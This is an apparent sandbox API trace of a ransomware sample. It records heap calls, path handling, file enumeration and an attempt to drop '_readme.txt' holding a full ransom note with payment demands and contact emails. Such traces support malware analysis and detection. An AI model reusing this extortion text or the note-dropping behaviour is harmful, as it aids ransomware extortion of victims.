0x3b40090 [0165.787] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.787] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.787] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.788] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.788] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.788] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.788] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.788] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.788] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.788] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.788] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.788] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.788] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.788] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.788] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.788] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.788] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.788] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.788] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.788] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.788] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.788] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.788] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.788] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.788] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.788] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.788] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.788] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.788] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.788] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.788] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.788] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.788] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.788] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.788] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.789] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.789] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.789] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.789] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.789] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.789] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.789] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.789] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.789] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.789] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.789] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.789] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.789] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.789] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.789] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.789] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.789] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.789] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.789] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.789] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.789] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.789] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.789] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.789] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.789] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.789] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.790] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.790] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.790] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.790] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.790] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.790] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.790] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.790] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.790] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.790] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.790] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.790] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.790] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.790] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.790] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.790] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19ec8 [0165.790] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.790] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.790] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.790] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.790] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.790] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.790] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.790] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.790] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.790] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.790] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.790] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.790] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.790] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.790] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.790] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.790] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.791] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.791] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.791] PathFindFileNameW (pszPath="C:\\Boot\\zh-TW\\") returned="zh-TW\\" [0165.791] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0165.791] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.791] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.791] PathFindFileNameW (pszPath="") returned="" [0165.791] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0165.791] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0165.791] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b40090 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0165.791] FreeLibrary (hLibModule=0x759d0000) returned 1 [0165.792] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c390 | out: hHeap=0xcd0000) returned 1 [0165.792] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.792] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.792] PathAppendW (in: pszPath="C:\\Boot\\zh-TW\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-TW\\_readme.txt") returned 1 [0165.792] PathFileExistsW (pszPath="C:\\Boot\\zh-TW\\_readme.txt") returned 0 [0165.792] lstrcpyW (in: lpString1=0x3b44e70, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0165.792] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0165.792] CreateFileW (lpFileName="C:\\Boot\\zh-TW\\_readme.txt" (normalized: "c:\\boot\\zh-tw\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0165.792] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b1a750 | out: hHeap=0xcd0000) returned 1 [0165.792] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44e70 | out: hHeap=0xcd0000) returned 1 [0165.792] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.792] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-TW\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.793] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.793] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.793] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0165.793] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0165.793] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.793] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.793] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c200 | out: hHeap=0xcd0000) returned 1 [0165.793] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.793] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b41188 [0165.793] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.793] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.793] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41188 | out: hHeap=0xcd0000) returned 1 [0165.793] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b41188 [0165.793] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.793] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.793] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41188 | out: hHeap=0xcd0000) returned 1 [0165.793] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b41188 [0165.793] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.793] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.793] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41188 | out: hHeap=0xcd0000) returned 1 [0165.793] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b41188 [0165.793] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.793] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.793] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41188 | out: hHeap=0xcd0000) returned 1 [0165.794] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b41188 [0165.794] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.794] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.794] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41188 | out: hHeap=0xcd0000) returned 1 [0165.794] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b41188 [0165.794] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.794] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.794] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41188 | out: hHeap=0xcd0000) returned 1 [0165.794] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b41188 [0165.794] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.794] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc2e) returned 0x3b40090 [0165.794] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.794] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.794] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41188 | out: hHeap=0xcd0000) returned 1 [0165.794] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b41188 [0165.794] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.794] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.794] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41188 | out: hHeap=0xcd0000) returned 1 [0165.794] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b41188 [0165.794] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.794] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.794] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41188 | out: hHeap=0xcd0000) returned 1 [0165.794] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b41188 [0165.794] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.794] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.794] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41188 | out: hHeap=0xcd0000) returned 1 [0165.794] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b41188 [0165.794] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.794] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.794] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41188 | out: hHeap=0xcd0000) returned 1 [0165.794] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b41188 [0165.794] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.794] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.795] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41188 | out: hHeap=0xcd0000) returned 1 [0165.795] RtlAllocateHeap (HeapHandle=0xcd0000, 